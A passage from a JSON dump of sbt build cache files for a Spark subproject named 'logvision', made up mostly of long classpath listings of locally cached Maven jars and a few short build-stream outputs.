aches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\"]]"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/discoveredMainClasses/data",
    "content": "[]"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/managedSourcePaths/previous",
    "content": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[]]"
  },
  {
    "path": "spark/project/target/streams/compile/compile/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/compile/compileIncremental/_global/streams/export",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/compile/compileIncremental/_global/streams/out",
    "content": "[debug] Full compilation, no sources in previous analysis.\n"
  },
  {
    "path": "spark/project/target/streams/compile/copyResources/_global/streams/copy-resources",
    "content": "[[{},{}],{}]"
  },
  {
    "path": "spark/project/target/streams/compile/copyResources/_global/streams/out",
    "content": "[debug] Copy resource mappings: \n[debug] \t\n"
  },
  {
    "path": "spark/project/target/streams/compile/dependencyClasspath/_global/streams/export",
    "content": "/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\n"
  },
  {
    "path": "spark/project/target/streams/compile/exportedProducts/_global/streams/export",
    "content": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
  },
  {
    "path": "spark/project/target/streams/compile/externalDependencyClasspath/_global/streams/export",
    "content": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/d